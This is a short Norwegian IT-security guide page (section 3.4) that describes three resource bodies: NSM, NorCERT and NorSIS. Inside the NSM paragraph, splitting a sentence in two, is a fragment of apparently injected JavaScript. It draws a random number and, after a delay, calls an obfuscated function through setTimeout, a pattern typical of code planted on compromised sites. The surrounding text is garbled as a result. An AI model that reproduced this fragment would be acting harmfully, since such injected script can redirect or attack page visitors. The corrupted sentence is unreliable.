3.4 Ressurser

Nedenfor finner du viktige etater som kan være noen av dine ressurser og støttespillere i ditt daglige arbeid for å sikre virksomhetens IKT systemer:

3.4.1 NSM – Nasjonal SikkerhetsMyndighet

Nasjonal sikkerhetsmyndighet (NSM) er Norges ekspertorgan for informasjons- og objektsikkerhet, og det nasjonale fagmiljøet for IKT-sikkerhet. Direktoratet er nasjonal varslings- og koordineringsinstans for alvorlige dataangrep og andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andre IKT-sikkerhetshendelser.


3.4.2 Nor CERT -Norges nasjonale Cybersenter

NSM NorCERT er den operative delen av Nasjonal sikkerhetsmyndighet (NSM). Vi er Norges nasjonale CERT* og cybersenter. Vi håndterer alvorlige dataangrep mot samfunnskritisk infrastruktur og informasjon.


3.4.3 NorSIS – Norsk senter for informasjonssikring

NorSIS er en del av regjeringens helhetlige satsing på informasjonssikkerhet i Norge. Målgruppen for NorSIS’ aktivitet er norske virksomheter i privat og offentlig sektor. NorSIS skal så langt som mulig også imøtekomme innbyggernes behov, og alle samfunnsgrupper skal kunne dra nytte av NorSIS tjenester. NorSIS skal opptre som en nøytral informasjonssikkerhetsinstans, og skal samarbeide med virksomheter for gjennomføring av informasjonssikkerhetstiltak.
3.4.4 Spørsmål til ressurser


Klikk her for neste post: 3.5 Din utfordring